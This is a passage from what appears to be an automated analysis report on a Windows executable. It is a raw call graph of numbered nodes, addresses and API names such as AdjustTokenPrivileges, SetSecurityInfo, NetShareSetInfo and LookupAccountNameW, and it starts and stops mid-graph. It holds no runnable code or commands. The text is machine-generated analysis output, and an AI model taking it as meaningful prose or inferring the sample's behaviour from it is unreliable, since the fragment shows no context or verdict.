42245 7ff686844803 42244->42245 42246 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42245->42246 42248 7ff686844809 42246->42248 42249->42239 42249->42241 42249->42245 42250 7ff68684475d ISource 42249->42250 42301 7ff68682c870 70 API calls 4 library calls 42249->42301 42302 7ff686839ec0 35 API calls 4 library calls 42249->42302 42250->42240 42250->42245 42252 7ff6868447f8 42250->42252 42253 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42252->42253 42253->42254 42254->42244 42255->41825 42256->41829 42257->41880 42258->41896 42259->41903 42260->41879 42261->41883 42262->41925 42264->41923 42266->41935 42267->42016 42268->42014 42269->41961 42270->41968 42271->41990 42272->42001 42273->42027 42274->42061 42275->41982 42276->41993 42277->42055 42278->42046 42279->42023 42280->42030 42282->42035 42284->42025 42285->42038 42286->42086 42287->42033 42288->42052 42289->42066 42291->41976 42292->41995 42300->42237 42301->42249 42302->42249 42303->42151 42305->42169 42306->42211 42307->42176 42308->42213 42309->42176 42312->41775 42313->41792 42315->41797 42318 7ff686821649 EnterCriticalSection 42319 7ff686821664 LeaveCriticalSection 42318->42319 42320 7ff686821699 EnterCriticalSection 42319->42320 42321 7ff6868216bd 42320->42321 42322 7ff6868216b0 CloseHandle 42320->42322 42323 7ff6868216d6 LeaveCriticalSection 42321->42323 42324 7ff6868216c9 DeregisterEventSource 42321->42324 42322->42321 42329 7ff68683f350 64 API calls 3 library calls 42323->42329 42324->42323 42326 7ff6868216ea 42327 7ff686862180 _handle_errorf 8 API calls 42326->42327 42328 7ff6868216fc 42327->42328 42329->42326 42330 7ff686842dcb 42331 7ff686842dd9 42330->42331 42332 7ff68684346c 42330->42332 42333 7ff686842de7 42331->42333 42334 7ff686843481 42331->42334 42487 7ff686864c18 RtlPcToFileHeader RaiseException 42332->42487 42336 7ff686842e03 42333->42336 42475 7ff686847b10 155 API calls 6 library calls 42333->42475 42488 7ff686864c18 RtlPcToFileHeader RaiseException 42334->42488 42340 7ff686842e4f 42336->42340 42341 7ff686842e34 42336->42341 42354 7ff686842e90 42336->42354 42339 7ff68684349a 42489 7ff686864c18 RtlPcToFileHeader RaiseException 42339->42489 42345 7ff686842e6f 42340->42345 42346 7ff686842e54 42340->42346 42344 7ff686829520 35 API calls 42341->42344 42342 7ff686842df5 42342->42336 42342->42339 42348 7ff686842e39 42344->42348 42350 7ff686829520 35 API calls 42345->42350 42349 7ff686829520 35 API calls 42346->42349 42347 7ff6868434af 42490 7ff686864c18 RtlPcToFileHeader RaiseException 42347->42490 42476 7ff6868496d0 79 API calls 3 library calls 42348->42476 42355 7ff686842e59 42349->42355 42356 7ff686842e74 42350->42356 42352 7ff68684331f 42361 7ff686833f80 35 API calls 42352->42361 42358 7ff6868431dc 42354->42358 42369 7ff686842f4f 42354->42369 42477 7ff6868541a0 35 API calls 2 library calls 42354->42477 42362 7ff68684b710 254 API calls 42355->42362 42363 7ff68684bc40 240 API calls 42356->42363 42357 7ff6868434c4 42491 7ff686864c18 RtlPcToFileHeader RaiseException 42357->42491 42358->42352 42365 7ff68684320e 42358->42365 42482 7ff68687de6c 64 API calls 2 library calls 42358->42482 42359 7ff686842e4b 42366 7ff686842e6b 42359->42366 42368 7ff686843339 42361->42368 42362->42366 42363->42366 42372 7ff686829520 35 API calls 42365->42372 42366->42347 42366->42354 42367 7ff686842f27 42478 7ff686855f60 40 API calls 42367->42478 42377 7ff686833f80 35 API calls 42368->42377 42374 7ff686842fe1 42369->42374 42375 7ff686843054 42369->42375 42370 7ff6868434da 42378 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42370->42378 42376 7ff686843222 42372->42376 42379 7ff68684300e 42374->42379 42380 7ff686842ff3 42374->42380 42381 7ff686833f80 35 API calls 42375->42381 42382 7ff686843271 ISource 42376->42382 42395 7ff6868434e6 42376->42395 42383 7ff686843389 42377->42383 42384 7ff6868434e0 42378->42384 42387 7ff68684302e 42379->42387 42388 7ff686843013 42379->42388 42385 7ff686829520 35 API calls 42380->42385 42386 7ff68684308a 42381->42386 42389 7ff686843287 42382->42389 42483 7ff68685e1c0 94 API calls 4 library calls 42382->42483 42416 7ff686843502 42383->42416 42417 7ff6868433ee ISource 42383->42417 42400 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42384->42400 42393 7ff686842ff8 42385->42393 42394 7ff686833f80 35 API calls 42386->42394 42390 7ff686829520 35 API calls 42387->42390 42396 7ff686829520 35 API calls 42388->42396 42391 7ff6868432ce 42389->42391 42392 7ff6868432b3 42389->42392 42414 7ff68684328b 42389->42414 42398 7ff686843033 42390->42398 42401 7ff6868432ee 42391->42401 42402 7ff6868432d3 42391->42402 42399 7ff686829520 35 API calls 42392->42399 42479 7ff6868496d0 79 API calls 3 library calls 42393->42479 42415 7ff6868430c9 42394->42415 42404 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42395->42404 42405 7ff686843018 42396->42405 42406 7ff68684bc40 240 API calls 42398->42406 42408 7ff6868432b8 42399->42408 42400->42395 42411 7ff686829520 35 API calls 42401->42411 42409 7ff686829520 35 API calls 42402->42409 42404->42414 42412 7ff68684b710 254 API calls 42405->42412 42413 7ff68684302a 42406->42413 42407 7ff686843437 ISource 42419 7ff686862180 _handle_errorf 8 API calls 42407->42419 42484 7ff6868496d0 79 API calls 3 library calls 42408->42484 42420 7ff6868432d8 42409->42420 42410 7ff68684300a 42410->42413 42421 7ff6868432f3 42411->42421 42412->42413 42413->42357 42434 7ff68684304f ISource 42413->42434 42492 7ff686864c18 RtlPcToFileHeader RaiseException 42414->42492 42415->42370 42424 7ff686843130 ISource 42415->42424 42425 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42416->42425 42417->42407 42426 7ff686843508 42417->42426 42428 7ff68684344f 42419->42428 42429 7ff68684b710 254 API calls 42420->42429 42485 7ff68684e530 178 API calls 6 library calls 42421->42485 42424->42384 42424->42434 42425->42426 42431 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42426->42431 42427 7ff6868432ca 42430 7ff6868432ea 42427->42430 42429->42430 42432 7ff686843310 42430->42432 42486 7ff68687de6c 64 API calls 2 library calls 42430->42486 42433 7ff68684350e 42431->42433 42432->42352 42432->42414 42439 7ff686833f80 35 API calls 42433->42439 42435 7ff6868431c8 42434->42435 42480 7ff686856010 41 API calls 2 library calls 42434->42480 42481 7ff6868540e0 31 API calls 2 library calls 42435->42481 42440 7ff686843584 42439->42440 42441 7ff686833f80 35 API calls 42440->42441 42442 7ff6868435b2 ISource 42441->42442 42443 7ff68684371c ISource 42442->42443 42444 7ff6868443e2 42442->42444 42447 7ff6868443dd 42442->42447 42448 7ff686862180 _handle_errorf 8 API calls 42443->42448 42445 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42444->42445 42446 7ff6868443e8 42445->42446 42451 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42446->42451 42450 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42447->42450 42449 7ff6868443c0 42448->42449 42450->42444 42452 7ff6868443ee 42451->42452 42453 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42452->42453 42454 7ff6868443f4 42453->42454 42455 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42454->42455 42456 7ff6868443fa 42455->42456 42457 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42456->42457 42458 7ff686844400 42457->42458 42459 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42458->42459 42460 7ff686844406 42459->42460 42461 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42460->42461 42462 7ff68684440c 42461->42462 42463 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42462->42463 42464 7ff686844412 42463->42464 42465 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42464->42465 42466 7ff686844418 42465->42466 42467 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42466->42467 42468 7ff68684441e 42467->42468 42469 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42468->42469 42470 7ff686844424 42469->42470 42471 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42470->42471 42472 7ff68684442a 42471->42472 42473 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42472->42473 42474 7ff686844430 42473->42474 42475->42342 42476->42359 42477->42367 42478->42369 42479->42410 42480->42435 42481->42358 42482->42365 42483->42389 42484->42427 42485->42430 42486->42432 42487->42334 42488->42339 42489->42347 42490->42357 42491->42370 42492->42416 42493 7ff68683cd0a 42523 7ff68683d0a0 EnterCriticalSection 42493->42523 42497 7ff68683cdcf ISource 42499 7ff68683cdf6 42497->42499 42500 7ff68683cddb 42497->42500 42498 7ff68683cd1a ISource 42498->42497 42501 7ff68683d084 42498->42501 42503 7ff686829520 35 API calls 42499->42503 42502 7ff686833f80 35 API calls 42500->42502 42504 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42501->42504 42522 7ff68683cdf1 ISource 42502->42522 42511 7ff68683ce03 ISource 42503->42511 42506 7ff68683d089 42504->42506 42505 7ff68683cf9c RegisterEventSourceW 42550 7ff68686e62c 42505->42550 42508 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42506->42508 42510 7ff68683d08f 42508->42510 42515 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42510->42515 42511->42506 42512 7ff68683cec4 ISource 42511->42512 42513 7ff686829520 35 API calls 42512->42513 42521 7ff68683ced6 ISource 42513->42521 42517 7ff68683d095 42515->42517 42516 7ff68683d03e LeaveCriticalSection 42519 7ff686862180 _handle_errorf 8 API calls 42516->42519 42518 7ff68683cfea ISource 42518->42516 42520 7ff68683d065 42519->42520 42521->42505 42521->42510 42521->42522 42522->42505 42524 7ff68683d0db 42523->42524 42527 7ff68683d186 42523->42527 42525 7ff68683d1ab LeaveCriticalSection 42524->42525 42528 7ff686834fc0 36 API calls 42524->42528 42526 7ff686862180 _handle_errorf 8 API calls 42525->42526 42530 7ff68683cd11 42526->42530 42531 7ff686833f80 35 API calls 42527->42531 42529 7ff68683d0f2 42528->42529 42532 7ff68683d123 42529->42532 42533 7ff68682ac70 35 API calls 42529->42533 42540 7ff686834fc0 42530->42540 42536 7ff68683d17f ISource 42531->42536 42534 7ff686833f80 35 API calls 42532->42534 42533->42532 42535 7ff68683d145 42534->42535 42535->42525 42535->42536 42537 7ff68683d1cc 42535->42537 42536->42525 42538 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42537->42538 42539 7ff68683d1d1 42538->42539 42541 7ff6868621d4 std::_Facet_Register 5 API calls 42540->42541 42542 7ff686834fec memcpy_s 42541->42542 42543 7ff686835010 GetModuleFileNameW 42542->42543 42544 7ff686835044 42543->42544 42547 7ff686835066 42543->42547 42546 7ff686833f80 35 API calls 42544->42546 42545 7ff686835093 ISource 42545->42498 42546->42547 42547->42545 42548 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42547->42548 42549 7ff6868350be 42548->42549 42551 7ff68686e65c 42550->42551 42552 7ff68686e645 42550->42552 42569 7ff68686e5cc 42551->42569 42576 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 42552->42576 42556 7ff68686e64a 42577 7ff6868688dc 31 API calls _invalid_parameter_noinfo 42556->42577 42557 7ff68686e66f CreateThread 42560 7ff68686e69f GetLastError 42557->42560 42562 7ff68686e6ac 42557->42562 42559 7ff68683cfd9 42559->42518 42568 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 42559->42568 42578 7ff68686e188 14 API calls 2 library calls 42560->42578 42562->42559 42563 7ff68686e6bc CloseHandle 42562->42563 42564 7ff68686e6c2 42562->42564 42563->42564 42565 7ff68686e6cb FreeLibrary 42564->42565 42566 7ff68686e6d1 42564->42566 42565->42566 42579 7ff686875054 42566->42579 42568->42518 42585 7ff686874fdc 42569->42585 42572 7ff686875054 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 42573 7ff68686e5f8 42572->42573 42574 7ff68686e619 42573->42574 42575 7ff68686e5ff GetModuleHandleExW 42573->42575 42574->42557 42574->42562 42575->42574 42576->42556 42577->42559 42578->42562 42580 7ff686875059 HeapFree 42579->42580 42581 7ff686875089 Concurrency::details::SchedulerProxy::DeleteThis 42579->42581 42580->42581 42582 7ff686875074 42580->42582 42581->42559 42594 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 42582->42594 42584 7ff686875079 GetLastError 42584->42581 42591 7ff686874fed _Toupper 42585->42591 42586 7ff68687503e 42593 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 42586->42593 42587 7ff686875022 HeapAlloc 42589 7ff68686e5ee 42587->42589 42587->42591 42589->42572 42591->42586 42591->42587 42592 7ff6868724d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42591->42592 42592->42591 42593->42589 42594->42584 42595 7ff686872ff4 42596 7ff68687305b 42595->42596 42597 7ff686873011 GetModuleHandleW 42595->42597 42605 7ff686872eec 42596->42605 42597->42596 42603 7ff68687301e 42597->42603 42600 7ff68687309d 42602 7ff6868730af 42603->42596 42619 7ff6868730fc GetModuleHandleExW 42603->42619 42625 7ff68686f264 EnterCriticalSection 42605->42625 42607 7ff686872f08 42608 7ff686872f24 39 API calls 42607->42608 42609 7ff686872f11 42608->42609 42610 7ff68686f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 42609->42610 42611 7ff686872f19 42610->42611 42611->42600 42612 7ff6868730b0 42611->42612 42626 7ff68687aa24 42612->42626 42615 7ff6868730ea 42617 7ff6868730fc 3 API calls 42615->42617 42616 7ff6868730d9 GetCurrentProcess TerminateProcess 42616->42615 42618 7ff6868730f1 ExitProcess 42617->42618 42620 7ff686873122 GetProcAddress 42619->42620 42621 7ff686873141 42619->42621 42620->42621 42622 7ff686873139 42620->42622 42623 7ff68687314b FreeLibrary 42621->42623 42624 7ff686873151 42621->42624 42622->42621 42623->42624 42624->42596 42627 7ff68687aa42 42626->42627 42629 7ff6868730bd 42626->42629 42630 7ff686877b70 5 API calls try_get_function 42627->42630 42629->42615 42629->42616 42630->42629 42631 7ff686857715 42632 7ff68685771f 42631->42632 42633 7ff686857ef0 42631->42633 42635 7ff68685772c 42632->42635 42636 7ff6868579d1 42632->42636 42732 7ff686856970 33 API calls 4 library calls 42633->42732 42637 7ff686833f80 35 API calls 42635->42637 42638 7ff686857a48 42636->42638 42640 7ff686857bb6 42636->42640 42641 7ff6868579e3 42636->42641 42639 7ff686857759 42637->42639 42648 7ff686829520 35 API calls 42638->42648 42656 7ff686857a86 ctype 42638->42656 42642 7ff686833f80 35 API calls 42639->42642 42640->42638 42647 7ff68684a350 254 API calls 42640->42647 42643 7ff6868579ed 42641->42643 42644 7ff6868579f0 CreateFileW 42641->42644 42649 7ff686857790 42642->42649 42643->42644 42645 7ff686857a29 42644->42645 42646 7ff686857a35 GetLastError 42644->42646 42652 7ff686857c03 SetSecurityInfo 42645->42652 42646->42638 42657 7ff686857bdc 42647->42657 42653 7ff686857a66 42648->42653 42722 7ff6868342a0 58 API calls 3 library calls 42649->42722 42650 7ff68685765d ISource 42662 7ff6868576aa ISource ctype 42650->42662 42677 7ff686857fe7 42650->42677 42651 7ff686857ef9 ISource 42651->42650 42658 7ff686857fdc 42651->42658 42667 7ff686857fe1 42651->42667 42712 7ff686858005 42651->42712 42652->42638 42666 7ff686857b3d 42652->42666 42724 7ff6868350c0 73 API calls 3 library calls 42653->42724 42654 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42660 7ff68685800b 42654->42660 42675 7ff686857af9 42656->42675 42689 7ff686857b33 42656->42689 42725 7ff686859fb0 16 API calls _handle_errorf 42656->42725 42657->42638 42657->42652 42661 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42658->42661 42661->42667 42686 7ff686862180 _handle_errorf 8 API calls 42662->42686 42664 7ff686857d05 42672 7ff686857ff9 42664->42672 42673 7ff686857d2b 42664->42673 42679 7ff686857b58 42666->42679 42680 7ff686857b4f CloseHandle 42666->42680 42668 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42667->42668 42668->42677 42669 7ff686857a75 42669->42656 42685 7ff686829520 35 API calls 42669->42685 42670 7ff686857e78 42670->42666 42696 7ff686857ec8 NetShareSetInfo 42670->42696 42671 7ff686857cd9 42697 7ff686833f80 35 API calls 42671->42697 42713 7ff686857d00 ISource 42671->42713 42684 7ff686829910 33 API calls 42672->42684 42698 7ff686833f80 35 API calls 42673->42698 42674 7ff6868577a4 ISource 42681 7ff686857fed 42674->42681 42687 7ff6868579cd 42674->42687 42688 7ff686857857 42674->42688 42700 7ff686857ff3 42674->42700 42675->42666 42675->42689 42726 7ff686859fb0 16 API calls _handle_errorf 42675->42726 42678 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42677->42678 42678->42681 42682 7ff686857b6d 42679->42682 42683 7ff686857b62 RegCloseKey 42679->42683 42680->42679 42693 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42681->42693 42727 7ff686856970 33 API calls 4 library calls 42682->42727 42683->42682 42695 7ff686857fff 42684->42695 42685->42656 42699 7ff6868576f8 42686->42699 42687->42636 42723 7ff686856970 33 API calls 4 library calls 42688->42723 42689->42664 42689->42666 42689->42671 42704 7ff686857e16 SetNamedSecurityInfoW 42689->42704 42690 7ff686857dcb NetShareGetInfo 42691 7ff686857e06 42690->42691 42692 7ff686857de2 42690->42692 42691->42704 42705 7ff686857e10 NetApiBufferFree 42691->42705 42710 7ff686833f80 35 API calls 42692->42710 42693->42700 42708 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42695->42708 42696->42666 42697->42713 42706 7ff686857d52 42698->42706 42703 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42700->42703 42702 7ff686857b76 42728 7ff686834230 31 API calls 2 library calls 42702->42728 42703->42672 42704->42666 42704->42670 42705->42704 42706->42695 42706->42713 42708->42712 42709 7ff6868578ee ISource 42709->42667 42716 7ff68685793e ISource 42709->42716 42710->42691 42711 7ff686857b80 42729 7ff686834230 31 API calls 2 library calls 42711->42729 42712->42654 42713->42690 42714 7ff686857860 ISource 42714->42658 42714->42709 42714->42712 42716->42677 42721 7ff68685798a ISource ctype 42716->42721 42717 7ff686857b8a 42730 7ff686834230 31 API calls 2 library calls 42717->42730 42719 7ff686857b94 42731 7ff686834230 31 API calls 2 library calls 42719->42731 42721->42662 42722->42674 42723->42714 42724->42669 42725->42675 42726->42689 42727->42702 42728->42711 42729->42717 42730->42719 42731->42662 42732->42651 42733 7ff686843fd8 AdjustTokenPrivileges 42734 7ff68684400a GetLastError 42733->42734 42735 7ff686844023 GetLastError CloseHandle 42733->42735 42734->42735 42736 7ff686844014 CloseHandle 42734->42736 42738 7ff686844037 ISource 42735->42738 42736->42738 42737 7ff68684441e 42741 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42737->42741 42738->42737 42739 7ff686833f80 35 API calls 42738->42739 42740 7ff686844424 42738->42740 42747 7ff6868441d3 ISource 42738->42747 42742 7ff686844105 42739->42742 42743 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42740->42743 42741->42740 42745 7ff686833f80 35 API calls 42742->42745 42746 7ff68684442a 42743->42746 42744 7ff686844314 42748 7ff686844331 42744->42748 42784 7ff68685e4b0 42744->42784 42757 7ff686844135 ISource 42745->42757 42751 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42746->42751 42749 7ff68685e4b0 92 API calls 42747->42749 42753 7ff686844268 42747->42753 42758 7ff686844356 42747->42758 42752 7ff68685e4b0 92 API calls 42748->42752 42756 7ff686844352 42748->42756 42748->42758 42749->42747 42754 7ff686844430 42751->42754 42752->42756 42753->42744 42755 7ff68685e4b0 92 API calls 42753->42755 42753->42758 42755->42753 42756->42758 42760 7ff68684a350 254 API calls 42756->42760 42757->42746 42757->42747 42762 7ff6868443dd 42757->42762 42759 7ff686862180 _handle_errorf 8 API calls 42758->42759 42761 7ff6868443c0 42759->42761 42760->42758 42763 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42762->42763 42764 7ff6868443e2 42763->42764 42765 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42764->42765 42766 7ff6868443e8 42765->42766 42767 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42766->42767 42768 7ff6868443ee 42767->42768 42769 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42768->42769 42770 7ff6868443f4 42769->42770 42771 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42770->42771 42772 7ff6868443fa 42771->42772 42773 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42772->42773 42774 7ff686844400 42773->42774 42775 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42774->42775 42776 7ff686844406 42775->42776 42777 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42776->42777 42778 7ff68684440c 42777->42778 42779 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42778->42779 42780 7ff686844412 42779->42780 42781 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42780->42781 42782 7ff686844418 42781->42782 42783 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42782->42783 42783->42737 42786 7ff68685e4f6 ctype 42784->42786 42785 7ff68685e50c ConvertStringSidToSidW 42787 7ff68685e51b 42785->42787 42797 7ff68685e53b 42785->42797 42786->42785 42911 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42787->42911 42789 7ff68685e525 LocalFree 42801 7ff68685ebc1 ISource 42789->42801 42792 7ff686862180 _handle_errorf 8 API calls 42793 7ff68685ebd4 42792->42793 42793->42748 42794 7ff686833f80 35 API calls 42795 7ff68685e74b 42794->42795 42877 7ff686834750 42795->42877 42799 7ff686833f80 35 API calls 42797->42799 42821 7ff68685e6a7 ISource 42797->42821 42844 7ff68685e5d7 ISource 42797->42844 42798 7ff68685e759 ISource 42805 7ff68685ebfa 42798->42805 42806 7ff686860c18 13 API calls 42798->42806 42817 7ff68685e7e9 42798->42817 42811 7ff68685e610 ISource 42799->42811 42800 7ff68685ec18 42802 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42800->42802 42801->42792 42809 7ff68685ec1e 42802->42809 42803 7ff68685ebf4 42808 7ff686829910 33 API calls 42803->42808 42804 7ff68685ebef 42812 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42804->42812 42810 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42805->42810 42813 7ff68685e7b9 42806->42813 42807 7ff68685ec12 42814 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42807->42814 42808->42805 42815 7ff68685ec00 42810->42815 42811->42803 42811->42807 42816 7ff686833f80 35 API calls 42811->42816 42812->42803 42912 7ff686835cf0 70 API calls 42813->42912 42814->42800 42820 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42815->42820 42816->42821 42818 7ff686829520 35 API calls 42817->42818 42841 7ff68685e981 ISource 42817->42841 42822 7ff68685e839 42818->42822 42824 7ff68685ec06 42820->42824 42821->42807 42848 7ff68685f9c0 42821->42848 42825 7ff686829520 35 API calls 42822->42825 42828 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42824->42828 42827 7ff68685e847 DsGetDcNameW 42825->42827 42826 7ff68685e9ef 42830 7ff68685ea1d 42826->42830 42831 7ff68685ea02 42826->42831 42826->42844 42833 7ff68685e89e 42827->42833 42838 7ff68685e912 ISource 42827->42838 42832 7ff68685ec0c 42828->42832 42835 7ff686833f80 35 API calls 42830->42835 42830->42844 42834 7ff68685f3c0 46 API calls 42831->42834 42836 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42832->42836 42840 7ff686833f80 35 API calls 42833->42840 42834->42844 42837 7ff68685ea4c 42835->42837 42836->42807 42842 7ff68685f3c0 46 API calls 42837->42842 42838->42815 42839 7ff686833f80 35 API calls 42838->42839 42838->42841 42839->42841 42843 7ff68685e8bc 42840->42843 42841->42832 42884 7ff68685f3c0 42841->42884 42842->42844 42913 7ff68683eaf0 8 API calls 3 library calls 42843->42913 42844->42800 42844->42801 42844->42804 42844->42807 42844->42824 42844->42832 42846 7ff68685e901 42846->42838 42847 7ff68685e90b NetApiBufferFree 42846->42847 42847->42838 42849 7ff686860c18 13 API calls 42848->42849 42850 7ff68685f9e9 42849->42850 42852 7ff68682c870 70 API calls 42850->42852 42853 7ff68685faa2 42850->42853 42851 7ff686860c18 13 API calls 42855 7ff68685fb3b 42851->42855 42852->42850 42853->42851 42876 7ff68685e706 42853->42876 42854 7ff68682c870 70 API calls 42854->42855 42855->42854 42857 7ff68685fbf0 42855->42857 42856 7ff686860c18 13 API calls 42859 7ff68685fc89 42856->42859 42857->42856 42857->42876 42858 7ff68682c870 70 API calls 42858->42859 42859->42858 42861 7ff68685fd40 42859->42861 42860 7ff686860c18 13 API calls 42862 7ff68685fdd9 42860->42862 42861->42860 42861->42876 42864 7ff68682c870 70 API calls 42862->42864 42865 7ff68685fe90 42862->42865 42863 7ff686860c18 13 API calls 42866 7ff68685ff29 42863->42866 42864->42862 42865->42863 42865->42876 42868 7ff68682c870 70 API calls 42866->42868 42869 7ff68685ffe0 42866->42869 42867 7ff686860c18 13 API calls 42870 7ff686860079 42867->42870 42868->42866 42869->42867 42869->42876 42872 7ff68682c870 70 API calls 42870->42872 42873 7ff686860130 42870->42873 42871 7ff686860c18 13 API calls 42875 7ff6868601c9 42871->42875 42872->42870 42873->42871 42873->42876 42874 7ff68682c870 70 API calls 42874->42875 42875->42874 42875->42876 42876->42794 42878 7ff686833f80 35 API calls 42877->42878 42879 7ff686834791 42878->42879 42914 7ff68686e3a4 42879->42914 42881 7ff6868347e3 ctype 42881->42798 42883 7ff686833f80 35 API calls 42883->42881 42885 7ff68685f3ea LookupAccountNameW GetLastError 42884->42885 42887 7ff68685f469 42885->42887 42888 7ff68685f45e GetLastError 42885->42888 42890 7ff68685f4bb 42887->42890 42891 7ff68685f492 42887->42891 42895 7ff68685f4a4 memcpy_s 42887->42895 42906 7ff68685f61f ISource 42888->42906 42893 7ff6868621d4 std::_Facet_Register 5 API calls 42890->42893 42892 7ff68685f653 Concurrency::cancel_current_task 42891->42892 42894 7ff6868621d4 std::_Facet_Register 5 API calls 42891->42894 42893->42895 42894->42895 42902 7ff68685f5f0 ISource 42895->42902 42939 7ff686835790 35 API calls 3 library calls 42895->42939 42897 7ff68685f4f7 LookupAccountNameW 42898 7ff68685f557 GetLastError 42897->42898 42899 7ff68685f561 42897->42899 42903 7ff68685f5b7 42898->42903 42904 7ff686833f80 35 API calls 42899->42904 42900 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42901 7ff68685f652 42900->42901 42901->42892 42902->42900 42902->42906 42903->42902 42907 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42903->42907 42905 7ff68685f586 42904->42905 42905->42903 42908 7ff68685f590 IsValidSid 42905->42908 42906->42826 42907->42902 42908->42903 42909 7ff68685f59d ctype 42908->42909 42940 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42909->42940 42911->42789 42912->42817 42913->42846 42917 7ff68686e218 42914->42917 42938 7ff68686f264 EnterCriticalSection 42917->42938 42919 7ff68686e244 42920 7ff68686e24c 42919->42920 42922 7ff68686e26f 42919->42922 42921 7ff68686e1f8 _Wcrtomb 14 API calls 42920->42921 42923 7ff68686e251 42921->42923 42924 7ff68686e30c 39 API calls 42922->42924 42925 7ff6868688dc _invalid_parameter_noinfo 31 API calls 42923->42925 42929 7ff68686e277 42924->42929 42926 7ff68686e25d 42925->42926 42927 7ff68686f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 42926->42927 42928 7ff6868347b7 42927->42928 42928->42881 42928->42883 42929->42926 42930 7ff68686e2b4 42929->42930 42931 7ff68686e2a4 42929->42931 42933 7ff686875174 _Getctype 31 API calls 42930->42933 42932 7ff68686e1f8 _Wcrtomb 14 API calls 42931->42932 42932->42926 42934 7ff68686e2c2 42933->42934 42934->42926 42935 7ff68686e2f5 42934->42935 42936 7ff68686892c _invalid_parameter_noinfo_noreturn 17 API calls 42935->42936 42937 7ff68686e309 42936->42937 42939->42897 42940->42903 42941 7ff68686c2fd 42942 7ff68686c303 42941->42942 42945 7ff68686c309 42941->42945 42943 7ff68686c36a 42942->42943 42942->42945 42968 7ff68686cf6c 31 API calls 2 library calls 42943->42968 42947 7ff68686c38d 42945->42947 42950 7ff68686c32d 42945->42950 42969 7ff68686cda0 32 API calls 2 library calls 42945->42969 42948 7ff686862180 _handle_errorf 8 API calls 42947->42948 42949 7ff68686c514 42948->42949 42950->42947 42951 7ff68686c46f 42950->42951 42970 7ff68686aeec 63 API calls 42950->42970 42955 7ff68686c492 42951->42955 42971 7ff68686d42c 42951->42971 42954 7ff68686c4d8 42960 7ff68686d280 42954->42960 42955->42954 42978 7ff68686aeec 63 API calls 42955->42978 42961 7ff68686d2a2 42960->42961 42962 7ff68686d331 42960->42962 42961->42962 42963 7ff68686d2ad 42961->42963 42964 7ff68686d42c 63 API calls 42962->42964 42967 7ff68686c4e2 42962->42967 42963->42967 42980 7ff686878a80 25 API calls 3 library calls 42963->42980 42981 7ff6868799bc 42963->42981 42964->42967 42967->42947 42979 7ff68686aeec 63 API calls 42967->42979 42968->42950 42969->42950 42970->42951 42972 7ff68686d462 42971->42972 42975 7ff68686d467 42971->42975 43141 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 42972->43141 42974 7ff68686d500 42974->42955 